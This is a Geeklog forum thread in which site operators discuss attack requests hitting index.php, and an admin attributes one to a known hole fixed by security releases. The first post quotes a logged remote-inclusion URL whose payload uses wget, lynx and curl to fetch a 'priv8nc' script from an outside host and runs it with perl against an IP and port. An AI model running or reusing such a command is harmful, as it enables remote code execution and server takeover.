Welcome to Geeklog, Anonymous Sunday, December 22 2024 @ 11:35 am EST

Geeklog Forums

A backdoor in index.php?


Status: offline

LWC

Forum User
Full Member
Registered: 02/19/04
Posts: 818
My site's spammers seem to try to find a backdoor in index.php.
I seem to be getting frequent visits to
/index.php?page=http://whatever...

For example:
/index.php?page=http://www.bh-net.dk/cmd2.gif?&cmd=cd /tmp;wget www.noti-auto.com.ar/priv8nc;lynx -source www.noti-auto.com.ar/priv8nc >> priv8nc2;curl www.noti-auto.com.ar/priv8nc > priv8nc2;perl priv8nc 200.220.236.26 2232 ;perl priv8nc2 200.220.236.26 2232

Not that index.php even accepts a "page=http://" query...so what gives?
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Not spammers - script kiddies. They don't know what they're doing either. Just ignore them ...

I've stopped counting the attempts to exploit things we're don't even run here on geeklog.net, like awstats, phpBB, Coppermine, ...

bye, Dirk
 Quote

Status: offline

LWC

Forum User
Full Member
Registered: 02/19/04
Posts: 818
Do you think it's personal or do they just come from Google, etc. because of my use of PHP pages?

I have some sub domains and only one of them has a major presence in Google and uses Geeklog. Only that one gets attacked. Its .htaccess file keeps getting bigger and bigger to stop bandwidth waste (I add the referrerer of each attempt to a black list). The most disturbing thing is that the blocked visitors don't stop coming back even though they end up in http://127.0.0.1 (your solution)! Why would they come back for that?! I thought it'd be like bouncing an e-mail message, but I read that turned out to be a no-no nowadays (because the spammers don't use real addresses anyway)...

I have more spammers and script kiddies than human visitors and it starts to annoy. What am I, writing a blog for robots...?
 Quote

Matt

Anonymous
Somebody found some kind of backdoor on my system. I'm not sure if it's a Geeklog hole or a PHP hole. They entered requests like
GET /blog/index.php?CMD=ls+-la

and the commands got executed. They did some nastier stuff after the ls.

When I try the same thing, it doesn't seem to work.

Immediately before the CMD requests, I see a
POST /blog/users.php

so they may have "logged on", but even when I logon, I can't seem to to the same things they did. This looks ugly. Any suggestions?
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Please send us the details (server logs etc. would certainly help). See here for the procedure.

bye, Dirk
 Quote

Matt

Anonymous
Info has been sent. Thanks.
 Quote

Yvo

Anonymous
Same thing (index.php?CMD=(command))is happening on a FreeBSD 6.0 box with Apace 1.3.34 & PHP 4.4.2.

This has been driving us all week. This is a shared hosting box and it keeps getting irc bots installed over the file system. The customer running geeklog has been notified, however if this is a new bug I have no choice but to disable their website this weekend.

 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Quote by Yvo: Same thing (index.php?CMD=(command))is happening on a FreeBSD 6.0 box with Apace 1.3.34 & PHP 4.4.2.

This is the issue that was resolved by Geeklog 1.4.0sr1 and 1.3.11sr4. Please upgrade ASAP (to 1.3.11sr5 / 1.4.0sr2, of course).

bye, Dirk
 Quote

All times are EST. The time is now 11:35 am.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content